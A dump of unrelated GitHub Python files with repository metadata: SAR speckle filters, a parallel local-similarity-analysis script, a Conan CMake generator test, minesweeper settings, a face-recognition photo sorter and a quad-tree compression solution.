lib/lambdalib/lambda_fitting.py
|
lambda_fitting.py
|
py
| 8,421 |
python
|
en
|
code
| 0 |
github-code
|
6
|
659465820
|
import numpy as np
from tqdm import tqdm
from statistics import median
class Filter :
"""
    To add:
    - Frost filter, Gamma-MAP filter, Kuan filter
    - Autoencoder-based filtering?
"""
    # class specialized for filtering SAR images formatted as (height, len, (HH, HV, VV))
def __init__(self, img : np.ndarray , kernel_size : tuple[int,int]) -> None:
#kernel_size is the window on which we will apply our filter, example :
# if kernel_size == (3,3) then the mean will be computed on its direct neighbours in a 3x3 square.
self.original_img = img
self.kernel_size = kernel_size
self.height, self.length, self.dim = img.shape
self.k_height, self.k_length = kernel_size[0], kernel_size[1]
self.filtered_img = np.zeros_like(self.original_img)
def apply_average_filter(self):
img = self.original_img
filtered_img = np.zeros(img.shape, dtype = np.complex128)
height, length, dim = img.shape
k_height, k_length = self.kernel_size[0], self.kernel_size[1]
filtered_img = np.zeros_like(img)
for i in range(height) :
for j in range(length) :
top = max(0, i - k_height//2)
bottom = min(height, i + k_height//2 + 1)
left = max(0, j-k_length//2)
right = min(length, j + k_length//2 + 1)
filtered_img[i,j] = np.mean(img[top:bottom, left:right, :], axis = (0,1), dtype = complex)
self.filtered_img = filtered_img
def apply_median_filter(self) :
        # this method applies the median to the real and imaginary parts of each component (HH, HV, VV)
for i in range(self.height) :
for k in range(self.length) :
top = max(0, i - self.k_height // 2 )
bottom = min(self.height, i + self.k_height // 2 + 1)
left = max(0, k - self.k_length // 2)
right = min(self.length, k + self.k_length // 2 + 1)
for d in range(self.dim) :
self.filtered_img[i, k, d] = median(np.real(self.original_img[top : bottom, left : right, d].reshape(-1))) + median(np.imag(self.original_img[top : bottom, left : right, d].reshape(-1))) * complex(real = 0, imag = 1)
def apply_lee_filter(self,sigma_v = 1.15):
"""
        Applies the Lee filter to the polarimetric SAR image.
        The result is stored in self.filtered_img.
        var_y is computed locally for each pixel, following Lee's paper: Polarimetric SAR Speckle Filtering And Its Implication For Classification
        Args:
            sigma_v: an arbitrarily chosen value for the standard deviation of the speckle noise that the filter removes
"""
img = self.original_img
size = self.k_height
img_mean = np.mean(img, axis = (0,1))
var_y = np.zeros_like(img)
var_x = np.zeros_like(img)
b = np.zeros_like(img)
for d in range(self.dim) :
for i in tqdm(range(self.height)) :
for j in range(self.length) :
top = max(0, i - self.k_height//2 )
bottom = min(self.height, i + self.k_height//2 + 1)
left = max(0, j - self.k_length//2)
right = min(self.length, j + self.k_length//2 + 1)
var_y[i,j,d] = np.mean(self.squared_norm(img[top:bottom, left: right,d]), axis = (0,1))-self.squared_norm(np.mean(img[top:bottom, left: right,d], axis = (0,1)))
var_x[i,j,d] = (var_y[i,j,d] - img_mean[d]*img_mean[d]*sigma_v*sigma_v)/(1+sigma_v*sigma_v)
if var_x[i,j,d] < 0 :
var_x[i,j,d] = 0
b[i,j,d] = var_x[i,j,d]/var_y[i,j,d]
self.filtered_img[i,j,d] = img_mean[d] + b[i,j,d] * (img[i,j,d] - img_mean[d])
return self.filtered_img
def squared_norm(self, c : complex) :
a = np.real(c)
b = np.imag(c)
return a*a + b*b
"""
Kuan and Frost filter are to be implemented
"""
|
ArnaudMi/Statistical-Learning-Methods-Contribution-for-the-description-of-SAR-targets
|
code/utils/filtre.py
|
filtre.py
|
py
| 4,147 |
python
|
en
|
code
| 0 |
github-code
|
6
|
1140042349
|
import compcore
from joblib import Parallel, delayed
import multiprocessing
import numpy as np
import scipy as sp
import h5py
import sys, csv, re, os, time, argparse, string, tempfile
try:
import lsalib
except ImportError:
from lsa import lsalib
def main():
parser = argparse.ArgumentParser()
arg_precision_default=1000
arg_delayLimit_default=0
parser.add_argument("dataFile", metavar="dataFile", type=argparse.FileType('r'), \
help="the input data file,\n \
                        m by (r * s) tab delimited text; top left cell starts with \
                        '#' to mark this is the header line; \n \
                        m is number of variables, r is number of replicates, \
                        s is number of time spots; \n \
first row: #header s1r1 s1r2 s2r1 s2r2; \
second row: x ?.?? ?.?? ?.?? ?.??; for a 1 by (2*2) data")
parser.add_argument("resultFile", metavar="resultFile", type=argparse.FileType('w'), \
help="the output result file")
parser.add_argument("-e", "--extraFile", dest="extraFile", default=None, \
type=argparse.FileType('r'),
help="specify an extra datafile, otherwise the first datafile will be used \n \
and only lower triangle entries of pairwise matrix will be computed")
parser.add_argument("-d", "--delayLimit", dest="delayLimit", default=arg_delayLimit_default, type=int,\
help="specify the maximum delay possible, default: {},\n \
must be an integer >=0 and <spotNum".format(arg_delayLimit_default))
parser.add_argument("-m", "--minOccur", dest="minOccur", default=50, type=int,
help="specify the minimum occurence percentile of all times, default: 50,\n")
parser.add_argument("-r", "--repNum", dest="repNum", default=1, type=int,
help="specify the number of replicates each time spot, default: 1,\n \
must be provided and valid. ")
parser.add_argument("-s", "--spotNum", dest="spotNum", default=4, type=int,
help="specify the number of time spots, default: 4,\n \
must be provided and valid. ")
parser.add_argument("-p", "--pvalueMethod", dest="pvalueMethod", default="perm", \
choices=["perm", "theo", "mix"],
help="specify the method for p-value estimation, \n \
default: pvalueMethod=perm, i.e. use permutation \n \
                        theo: theoretical approximation; if used also set -a value. \n \
mix: use theoretical approximation for pre-screening \
if promising (<0.05) then use permutation. ")
parser.add_argument("-x", "--precision", dest="precision", default=arg_precision_default, type=int,\
help="permutation/precision, specify the permutation \n \
number or precision=1/permutation for p-value estimation. \n \
default is {}, must be an integer >0 ".format(arg_precision_default) )
parser.add_argument("-b", "--bootNum", dest="bootNum", default=0, type=int, \
choices=[0, 100, 200, 500, 1000, 2000],
help="specify the number of bootstraps for 95%% confidence \
                        interval estimation, default: 0,\n \
choices: 0, 100, 200, 500, 1000, 2000. \n \
Setting bootNum=0 avoids bootstrap. \n \
Bootstrap is not suitable for non-replicated data.")
parser.add_argument("-t", "--transFunc", dest="transFunc", default='simple', \
choices=['simple', 'SD', 'Med', 'MAD'],\
help="specify the method to summarize replicates data, default: simple, \n \
choices: simple, SD, Med, MAD \n \
NOTE: \n \
simple: simple averaging \n \
SD: standard deviation weighted averaging \n \
Med: simple Median \n \
MAD: median absolute deviation weighted median;" )
parser.add_argument("-f", "--fillMethod", dest="fillMethod", default='none', \
choices=['none', 'zero', 'linear', 'quadratic', 'cubic', 'slinear', 'nearest'], \
help="specify the method to fill missing, default: none, \n \
choices: none, zero, linear, quadratic, cubic, slinear, nearest \n \
operation AFTER normalization: \n \
none: fill up with zeros ; \n \
operation BEFORE normalization: \n \
zero: fill up with zero order splines; \n \
linear: fill up with linear splines; \n \
slinear: fill up with slinear; \n \
quadratic: fill up with quadratic spline; \n \
cubic: fill up with cubic spline; \n \
nearest: fill up with nearest neighbor")
parser.add_argument("-n", "--normMethod", dest="normMethod", default='robustZ', \
choices=['percentile', 'percentileZ', 'pnz', 'robustZ', 'rnz', 'none'], \
help="must specify the method to normalize data, default: robustZ, \n \
choices: percentile, none, pnz, percentileZ, robustZ or a float \n \
NOTE: \n \
percentile: percentile normalization, including zeros (only with perm)\n \
pnz: percentile normalization, excluding zeros (only with perm) \n \
percentileZ: percentile normalization + Z-normalization \n \
rnz: percentileZ normalization + excluding zeros + robust estimates (theo, mix, perm OK) \n \
robustZ: percentileZ normalization + robust estimates \n \
(with perm, mix and theo, and must use this for theo and mix, default) \n")
parser.add_argument("-q", "--qvalueMethod", dest="qvalueMethod", \
default='scipy', choices=['scipy'],
help="specify the qvalue calculation method, \n \
scipy: use scipy and storeyQvalue function, default \n \
")
#R: use R's qvalue package, require X connection")
parser.add_argument("-T", "--trendThresh", dest="trendThresh", default=None, \
type=float, \
help="if trend series based analysis is desired, use this option \n \
                        NOTE: when this is used, must also supply reasonable \n \
values for -p, -a, -n options")
parser.add_argument("-a", "--approxVar", dest="approxVar", default=1, type=float,\
help="if use -p theo and -T, must set this value appropriately, \n \
precalculated -a {1.25, 0.93, 0.56,0.13 } for i.i.d. standard normal null \n \
and -T {0, 0.5, 1, 2} respectively. For other distribution \n \
and -T values, see FAQ and Xia et al. 2013 in reference")
parser.add_argument("-v", "--progressive", dest="progressive", default=0, type=int,
help="specify the number of progressive output to save memory, default: 0,\n \
2G memory is required for 1M pairwise comparison. ")
arg_namespace = parser.parse_args()
fillMethod = vars(arg_namespace)['fillMethod']
normMethod = vars(arg_namespace)['normMethod']
qvalueMethod = vars(arg_namespace)['qvalueMethod']
pvalueMethod = vars(arg_namespace)['pvalueMethod']
precision = vars(arg_namespace)['precision']
transFunc = vars(arg_namespace)['transFunc']
bootNum = vars(arg_namespace)['bootNum']
approxVar = vars(arg_namespace)['approxVar']
trendThresh = vars(arg_namespace)['trendThresh']
progressive = vars(arg_namespace)['progressive']
delayLimit = vars(arg_namespace)['delayLimit']
minOccur = vars(arg_namespace)['minOccur']
dataFile = vars(arg_namespace)['dataFile'] #dataFile
extraFile = vars(arg_namespace)['extraFile'] #extraFile
resultFile = vars(arg_namespace)['resultFile'] #resultFile
repNum = vars(arg_namespace)['repNum']
spotNum = vars(arg_namespace)['spotNum']
try:
extraFile_name = extraFile.name
except AttributeError:
extraFile_name = ''
assert trendThresh==None or trendThresh>=0
if transFunc == 'SD':
fTransform = lsalib.sdAverage
elif transFunc == 'Med':
fTransform = lsalib.simpleMedian
elif transFunc == 'MAD':
fTransform = lsalib.madMedian
else:
fTransform = lsalib.simpleAverage
if repNum < 5 and transFunc == 'SD':
print("Not enough replicates for SD-weighted averaging, fall back to simpleAverage", file=sys.stderr)
transFunc = 'simple'
if repNum < 5 and transFunc == 'MAD':
print("Not enough replicates for Median Absolute Deviation, fall back to simpleMedian", file=sys.stderr)
transFunc = 'Med'
if normMethod == 'none':
zNormalize = lsalib.noneNormalize
elif normMethod == 'percentile':
zNormalize = lsalib.percentileNormalize
elif normMethod == 'percentileZ':
zNormalize = lsalib.percentileZNormalize
elif normMethod == 'robustZ':
zNormalize = lsalib.robustZNormalize
elif normMethod == 'pnz':
zNormalize = lsalib.noZeroNormalize
elif normMethod == 'rnz':
zNormalize = lsalib.robustNoZeroNormalize
else:
zNormalize = lsalib.percentileZNormalize
start_time = time.time()
col = spotNum
total_row_0 = 0
total_row_1 = 0
block = 2000
first_file = "first_file.txt"
second_file = "second_file.txt"
with open(first_file, 'r') as textfile:
next(textfile)
for line in textfile:
total_row_0 += 1
with open(second_file, 'r') as textfile:
next(textfile)
for line in textfile:
total_row_1 += 1
i_m = 0
j_m = 0
start_0 = 1
end_0 = block
start_1 = 1
end_1 = block
if end_0 >= total_row_0:
end_0 = total_row_0
if end_1 >= total_row_1:
end_1 = total_row_1
manager = multiprocessing.Manager()
first_Data = manager.list()
second_Data = manager.list()
while i_m * block < total_row_0:
i_m += 1
skip_header = start_0
skip_footer = total_row_0 - end_0
firstData = np.genfromtxt(first_file, comments='#', delimiter='\t',missing_values=['na', '', 'NA'], filling_values=np.nan,usecols=range(1,spotNum*repNum+1), skip_header=skip_header, skip_footer=skip_footer)
if len(firstData.shape) == 1:
data = np.array([firstData])
firstFactorLabels = np.genfromtxt(first_file, comments='#', delimiter='\t', usecols=range(0,1), dtype='str', skip_header=skip_header, skip_footer=skip_footer).tolist()
if type(firstFactorLabels)==str:
firstFactorLabels=[firstFactorLabels]
factorNum = firstData.shape[0]
tempData=np.zeros( ( factorNum, repNum, spotNum), dtype='float' )
for i in range(0, factorNum):
for j in range(0, repNum):
try:
tempData[i,j] = firstData[i][np.arange(j,spotNum*repNum,repNum)]
except IndexError:
print("Error: one input file need more than two data row or use -e to specify another input file", file=sys.stderr)
quit()
for i in range(0, factorNum):
for j in range(0, repNum):
tempData[i,j] = lsalib.fillMissing( tempData[i,j], fillMethod )
first_Data.append(tempData)
while j_m * block < total_row_1:
j_m += 1
skip_header = start_1
skip_footer = total_row_1 - end_1
secondData = np.genfromtxt(second_file, comments='#', delimiter='\t',missing_values=['na', '', 'NA'], filling_values=np.nan,usecols=range(1,spotNum*repNum+1), skip_header=skip_header, skip_footer=skip_footer)
if len(secondData.shape) == 1:
data = np.array([secondData])
secondFactorLabels=np.genfromtxt( second_file, comments='#', delimiter='\t', usecols=range(0,1), dtype='str', skip_header=skip_header, skip_footer=skip_footer).tolist()
if type(secondFactorLabels)==str:
secondFactorLabels=[secondFactorLabels]
factorNum = secondData.shape[0]
tempData=np.zeros((factorNum,repNum,spotNum),dtype='float')
for i in range(0, factorNum):
for j in range(0, repNum):
try:
tempData[i,j] = secondData[i][np.arange(j,spotNum*repNum,repNum)]
except IndexError:
print("Error: one input file need more than two data row or use -e to specify another input file", file=sys.stderr)
quit()
for i in range(0, factorNum):
for j in range(0, repNum):
tempData[i,j] = lsalib.fillMissing( tempData[i,j], fillMethod )
second_Data.append(tempData)
merged_filename = 'merged_data_1.h5'
def myfun_pall(i):
data = compcore.LSA(total_row_0, total_row_1)
for j in range(0, len(second_Data)):
array = lsalib.palla_applyAnalysis( first_Data[i], second_Data[j], data, col, onDiag=True, delayLimit=delayLimit,bootNum=bootNum, pvalueMethod=pvalueMethod,
precisionP=precision, fTransform=fTransform, zNormalize=zNormalize, approxVar=approxVar, resultFile=resultFile, trendThresh=trendThresh,
firstFactorLabels=firstFactorLabels, secondFactorLabels=secondFactorLabels, qvalueMethod=qvalueMethod, progressive=progressive)
with h5py.File(merged_filename, 'w') as merged_hf:
merged_hf.create_dataset(f'data_{i}_{j}', data=array)
return 1
pool = multiprocessing.Pool(processes=10)
    # one worker task per block of the first input, mirroring the commented-out joblib call below
    results = [pool.apply_async(myfun_pall, args=(process_id,)) for process_id in range(len(first_Data))]
for result in results:
a = result.get()
# parallel_obj = Parallel(n_jobs= -1)
# parallel_obj(delayed(myfun_pall)(i) for i in range(0, len(first_Data)))
print("finishing up...", file=sys.stderr)
end_time=time.time()
print("time elapsed %f seconds" % (end_time - start_time), file=sys.stderr)
if __name__=="__main__":
main()
|
foolstars/a_elsa
|
elsa/lsa/ppi.py
|
ppi.py
|
py
| 14,310 |
python
|
en
|
code
| 0 |
github-code
|
6
|
2856076738
|
import re, unittest
from conans.model.settings import Settings
from conans.model.conan_file import ConanFile
from conans.client.generators.cmake import CMakeGenerator
class CMakeGeneratorTest(unittest.TestCase):
def extractMacro(self, name, text):
        pattern = r".*(macro\(%s\).*?endmacro\(\)).*" % name
return re.sub(pattern, r"\1", text, flags=re.DOTALL)
def aux_cmake_test_setup_test(self):
conanfile = ConanFile(None, None, Settings({}), None)
generator = CMakeGenerator(conanfile)
aux_cmake_test_setup = generator._aux_cmake_test_setup()
# extract the conan_basic_setup macro
macro = self.extractMacro("conan_basic_setup", aux_cmake_test_setup)
self.assertEqual("""macro(conan_basic_setup)
conan_check_compiler()
conan_output_dirs_setup()
conan_flags_setup()
conan_set_find_paths()
endmacro()""", macro)
# extract the conan_set_find_paths macro
macro = self.extractMacro("conan_set_find_paths", aux_cmake_test_setup)
self.assertEqual("""macro(conan_set_find_paths)
# CMake can find findXXX.cmake files in the root of packages
set(CMAKE_MODULE_PATH ${CONAN_CMAKE_MODULE_PATH} ${CMAKE_MODULE_PATH})
# Make find_package() to work
set(CMAKE_PREFIX_PATH ${CONAN_CMAKE_MODULE_PATH} ${CMAKE_PREFIX_PATH})
endmacro()""", macro)
|
AversivePlusPlus/AversivePlusPlus
|
tools/conan/conans/test/generators/cmake_test.py
|
cmake_test.py
|
py
| 1,364 |
python
|
en
|
code
| 31 |
github-code
|
6
|
23448338775
|
"""
Created on Wed Apr 27 18:09:57 2022
@author: ljhs8
"""
WIDTH = 750
HEIGHT = 600
GRID_SIZE= 9
GRID_WIDTH = 23
GRID_HEIGHT = 17
CELL_COUNT = GRID_HEIGHT*GRID_WIDTH
MINESCOUNT = 45
WHITE = "#C1D4D7"
GREY = "#ABB6B8"
|
Anonymousbowtie/Normal_minesweeper
|
settings.py
|
settings.py
|
py
| 240 |
python
|
en
|
code
| 0 |
github-code
|
6
|
3806456362
|
import pickle, custom_logger
from cmd_parser import parser, createModelString, performSortingString
from asyncio.log import logger
from os.path import isfile
from logging import INFO, DEBUG, WARN
import utils
import logging
args = parser.parse_args()
if args.debug:
custom_logger.initialize_logger(logger_level=DEBUG)
else:
custom_logger.initialize_logger(logger_level=INFO)
if args.mode == createModelString:
if args.name == None:
raise Exception(
"Please provide your name to save your face model with -n or --name"
)
if args.input_type == "image":
actual_images, not_images = utils.get_images_from_folder(args.input_folder)
logging.info(
"Images found in folder (These will be scanned) : {}".format(actual_images)
)
logging.info("Non-Images found in folder : {}".format(not_images))
if len(actual_images) == 0:
raise Exception("No suitable images found in folder provided")
logging.info("Tests passed, starting scan now")
import recognition_engine
actual_images = utils.join_path_list(args.input_folder, actual_images)
encodings = recognition_engine.train_from_images(
actual_images, debug=args.debug
)
logging.debug(encodings)
with open("{}.pkl".format(args.name), "wb") as f:
pickle.dump(encodings, f)
logging.info("Khatam!")
elif args.input_type == "video":
if args.input_file == None:
raise Exception("Please provide a video input file with -i or --input_file")
if not isfile(args.input_file):
raise Exception(
"'{}' is not a valid file. Please provide a valid file".format(
args.input_file
)
)
import recognition_engine
encodings = recognition_engine.train_from_video(
video_path=args.input_file, debug=args.debug
)
with open("{}.pkl".format(args.name), "wb") as f:
pickle.dump(encodings, f)
logging.info("Khatam!")
else:
raise Exception("You need to specify input type with -t or --input_type")
elif args.mode == performSortingString:
if args.name == None:
raise Exception(
"Please provide the name you gave while creating the model with -n or --name"
)
utils.verify_folder(args.input_folder)
images_to_sort, not_to_sort = utils.get_images_from_folder(args.input_folder)
final_paths = utils.join_path_list(args.input_folder, images_to_sort)
encodings = None
try:
with open("{}.pkl".format(args.name), "rb") as f:
encodings = pickle.load(f)
except Exception as E:
logger.critical(E)
exit(1)
found_directory = "found_directory"
not_found_directory = "not_found_directory"
utils.verify_folder(folder_path=found_directory, create=True)
utils.verify_folder(folder_path=not_found_directory, create=True)
threading = False if args.processes == 1 else True
import recognition_engine
recognition_engine.sort_into_directories(
images_to_test=final_paths,
perform_transfer=True,
debug=args.debug,
verbose=True,
threading=False,
target_encodings=encodings,
n_workers=args.processes,
)
logging.info("Khatam!")
logging.info("Ruko zara, sabar kato")
|
jmvaswani/picture-sorter
|
sorter.py
|
sorter.py
|
py
| 3,435 |
python
|
en
|
code
| 0 |
github-code
|
6
|
40732718573
|
# Baekjoon 1992: quad-tree compression of an N x N binary image.
# If the current square is uniform, print its colour; otherwise wrap the four
# N/2 x N/2 quadrants (top-left, top-right, bottom-left, bottom-right) in parentheses.
# Example: N=2 with rows "11" and "00" prints (1100).
n = int(input())
arr = [list(map(str, input().strip())) for i in range(n)]
def check(x, y, n):
    color = arr[x][y]
    for i in range(x, x+n):
        for j in range(y, y+n):
            if color != arr[i][j]:
                # mixed colours: recurse into the four quadrants
                print('(', end='')
                check(x, y, n//2)
                check(x, y+n//2, n//2)
                check(x+n//2, y, n//2)
                check(x+n//2, y+n//2, n//2)
                print(')', end='')
                return
    # uniform square: print its single digit
    print(color, end='')
check(0, 0, n)
|
seriokim/Coding-Study
|
백준 단계별로 풀어보기/분할정복/1992.py
|
1992.py
|
py
| 497 |
python
|
en
|
code
| 0 |
github-code
|
6
|